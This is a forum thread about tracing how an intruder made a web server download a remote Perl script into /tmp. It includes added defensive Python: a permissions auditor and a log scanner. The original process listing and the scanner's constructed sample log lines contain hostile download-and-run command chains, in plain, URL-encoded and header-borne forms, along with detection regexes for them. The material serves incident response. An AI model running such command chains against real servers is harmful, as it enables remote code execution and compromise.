cPanel & WHM Community Forums

Identifying Point of Entry

Discussion in 'General Discussion' started by glansing, Apr 4, 2007.

  1. glansing (Active Member)

    Hello,

    I'm trying to figure out how a hacker managed to get the following to execute.

    Code:
    31768 ?        S      0:00 sh -c cd /tmp;curl -O http://****.gov.br/maico.perl;ls
    31769 ?        S      0:01 curl -O http://*****.gov.br/maico.perl
    
    Now, I had curl chmoded to 0700 (owned by root) and when I went to check, it was 0755 -- I'm assuming it was overwritten during an automatic update. It's back at 0700 -- but I'd still like to figure out where the point of entry was.

    I can't find anything referring to anything above in the Apache logs; my assumption is it is an insecure script -- the destination IP was that of one of my resellers. This reseller has a number of clients with CMS systems.

    Any thoughts on what might be the actual point of entry? I'd appreciate any thoughts/suggestions of places to examine.

    Thank you.
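The drift described in this post (curl locked to 0700 by hand, found back at 0755 after an update) is the sort of thing to check mechanically rather than by memory. What follows is an added example written for this page, not code from the poster or from cPanel: it audits a list of binaries against the baseline "mode 0700, owned by a given uid", reports anything that drifted or went missing, and can restore the mode. The paths in BASELINE_PATHS are assumed locations, and demo() builds a throwaway fixture in a temp directory so the script runs without touching the real system.

```python
import os
import shutil
import stat
import tempfile

# Assumed locations for the tools the post locks down; adjust to the server.
BASELINE_PATHS = ["/usr/bin/curl", "/usr/bin/wget", "/usr/bin/lynx"]

# Any of these bits set means someone other than the owner can use the binary.
NON_OWNER_BITS = stat.S_IRWXG | stat.S_IRWXO


def audit_binaries(paths, expected_uid=0):
    """Compare each path against the baseline 'mode 0700, owned by expected_uid'.

    Returns a list of (path, problem) tuples; an empty list means nothing drifted.
    A missing binary is reported too, so a renamed or removed tool is noticed."""
    findings = []
    for path in paths:
        try:
            st = os.stat(path)
        except FileNotFoundError:
            findings.append((path, "missing"))
            continue
        mode = stat.S_IMODE(st.st_mode)
        if mode & NON_OWNER_BITS:
            findings.append((path, "group/other access: %04o" % mode))
        if st.st_uid != expected_uid:
            findings.append((path, "owner uid %d, expected %d" % (st.st_uid, expected_uid)))
    return findings


def restrict(path):
    """Clear the group/other bits and keep the owner's (0755 -> 0700, 0711 -> 0700).

    Ownership is deliberately not changed here: chown needs root, and a wrong
    owner deserves a human look rather than a silent fix."""
    mode = stat.S_IMODE(os.stat(path).st_mode) & ~NON_OWNER_BITS
    os.chmod(path, mode)
    return mode


def demo():
    """Constructed fixture, not a real server: two stand-ins for curl and wget in a
    temp dir, one drifted back to 0755 as in the post, plus a path that does not
    exist. Returns the audit before the fix, the mode restrict() set, and the
    audit afterwards."""
    workdir = tempfile.mkdtemp()
    try:
        drifted = os.path.join(workdir, "curl")
        locked = os.path.join(workdir, "wget")
        for path, mode in ((drifted, 0o755), (locked, 0o700)):
            with open(path, "w") as fh:
                fh.write("#!/bin/sh\n")
            os.chmod(path, mode)
        missing = os.path.join(workdir, "lynx")
        me = os.getuid()  # the fixture is owned by us, not root
        before = audit_binaries([drifted, locked, missing], expected_uid=me)
        fixed_mode = restrict(drifted)
        after = audit_binaries([drifted, locked], expected_uid=me)
        return before, fixed_mode, after
    finally:
        shutil.rmtree(workdir)


if __name__ == "__main__":
    # On a real box: run as root from cron or right after each automatic update.
    for path, problem in audit_binaries(BASELINE_PATHS):
        print("%s: %s" % (path, problem))
```

Run it from cron or from whatever hook fires after the update that reset the permissions, so the drift is caught within minutes instead of at the next incident. Treat the 0700 itself as a speed bump, not a control: a script that can run `sh -c` can just as easily fetch a file with Perl or PHP, or upload its own copy of curl, so the point of entry still has to be found and closed.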
     
  2. ramprage (Well-Known Member)

    I can give you a free WHM addon that scans various tmp partitions for malicious files, with reports; just contact me by PM.

    To find how the file got there, you'll need to do various greps of the domlogs from user accounts for particular string matches. I also highly recommend you add mod_security to your server. Also restrict common binaries such as wget so regular users cannot access them.
     
  3. glansing (Active Member)

    ramprage,

    I had locked everything down -- curl, wget, etc. But curl was somehow chmoded back to 0755.

    I installed mod_security a long time ago; it's working, configured and blocking.

    I've searched domlogs for various patterns, parts of the string encoded in different ways, and I can't find anything there.
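Both the advice in post 2 (grep the domlogs for string matches) and the dead end in post 3 (the string was searched for in several encodings and still not found) point at the same weakness of a plain grep: it matches one spelling of the payload, and the request line is not the only place a payload can sit. The scanner below is an added example for this page, not code from either poster or from cPanel. It parses Apache combined-format lines, URL-decodes the request, referer and User-Agent repeatedly (so %XX, +, and double-encoded %25XX spellings all collapse to the same text), and then matches a small set of indicators for the pattern seen in the thread: a `;`-chained `cd /tmp`, a download tool fetching a URL, and a query parameter pointing at a remote file. The sample log lines are constructed for the example, the domlog path in the comment is the usual location on servers of that era and may differ, and the indicator list is a starting point to extend, not a complete signature set.

```python
import re
import urllib.parse

# Apache "combined" format, which is what cPanel writes to domlogs
# (usually /usr/local/apache/domlogs/<domain>; adjust the path for the server).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"\s*$'
)

# Indicators are matched against the *decoded* text, so one pattern covers the
# plain, %XX-encoded, +-for-space and double-encoded spellings of the same payload.
INDICATORS = [
    ("shell-chain",    re.compile(r"(?:;|\|\||&&|\|)\s*(?:cd|curl|wget|perl|sh|ls)\b")),
    ("download-tool",  re.compile(r"\b(?:curl|wget|fetch|lynx)\s+(?:-{1,2}[\w=.]+\s+)*(?:https?|ftp)://", re.I)),
    ("tmp-dir",        re.compile(r"(?:^|[\s;|&=])/(?:tmp|var/tmp|dev/shm)\b")),
    ("remote-include", re.compile(r"[?&]\w+=(?:https?|ftp)://", re.I)),
]

# Constructed sample lines (not from the original thread). Lines 1, 3, 4 and 5
# carry payloads of the kind described in the thread; line 2 is ordinary traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [04/Apr/2007:10:12:01 -0500] "GET /gallery/index.php?page=http://203.0.113.77/r.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
203.0.113.9 - - [04/Apr/2007:10:12:07 -0500] "GET /index.php?id=42 HTTP/1.1" 200 2048 "http://www.example.invalid/" "Mozilla/5.0 (X11; Linux i686)"
203.0.113.5 - - [04/Apr/2007:10:12:33 -0500] "GET /cms/wrapper.php?u=%7Ccd%20%2Ftmp%3Bcurl%20-O%20http%3A%2F%2Fexample.invalid%2Fmaico.perl%3Bls%7C HTTP/1.1" 200 164 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
198.51.100.23 - - [04/Apr/2007:11:02:10 -0500] "GET /cms/wrapper.php?u=cd%2520%252Ftmp%253Bwget%2520http%253A%252F%252Fexample.invalid%252Fx.pl HTTP/1.1" 200 164 "-" "Mozilla/5.0 (X11; Linux i686)"
203.0.113.5 - - [04/Apr/2007:11:40:52 -0500] "GET /index.php HTTP/1.1" 200 300 "-" "cd /tmp;curl -O http://example.invalid/maico.perl;ls"
"""


def decode_fully(text, max_passes=3):
    """Peel off URL-encoding until the string stops changing (bounded, so a
    pathological input cannot loop forever). Handles double-encoding like %253B."""
    for _ in range(max_passes):
        decoded = urllib.parse.unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text


def scan_line(line):
    """Return [(field, indicator), ...] for one log line, [] if clean or unparsable.
    The referer and User-Agent are scanned too: a payload delivered in a header
    never shows in the request line, which is where a plain grep would look."""
    m = LOG_RE.match(line)
    if not m:
        return []
    hits = []
    for field in ("req", "ref", "ua"):
        text = decode_fully(m.group(field))
        for name, pattern in INDICATORS:
            if pattern.search(text):
                hits.append((field, name))
    return hits


def scan_log(log_text):
    """Scan a whole log; each finding keeps the decoded request so the analyst
    sees the payload as the server saw it, not as it was encoded on the wire."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        hits = scan_line(line)
        if hits:
            m = LOG_RE.match(line)
            findings.append({
                "line": lineno,
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "hits": hits,
                "decoded_request": decode_fully(m.group("req")),
            })
    return findings


if __name__ == "__main__":
    # Real use: scan_log(open("/usr/local/apache/domlogs/example.com").read())
    for f in scan_log(SAMPLE_LOG):
        print("line %d %s %s" % (f["line"], f["ip"], f["time"]))
        print("    %s" % f["decoded_request"])
        for field, name in f["hits"]:
            print("    %-4s %s" % (field, name))
```

Two caveats matter for a case like this one. First, the access log records only the request line and a few headers; a payload sent in a POST body, a cookie, or a header Apache does not log will not be in the domlogs at all, however it is grepped, which is one plausible reason a search turns up nothing. Second, the process listing showed the command running as `sh -c`, so the time stamp of that process is worth lining up against the domlogs of every account on the reseller's IP, not only the one that was suspected: the request that spawned it is most likely within a few seconds of the process start.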
     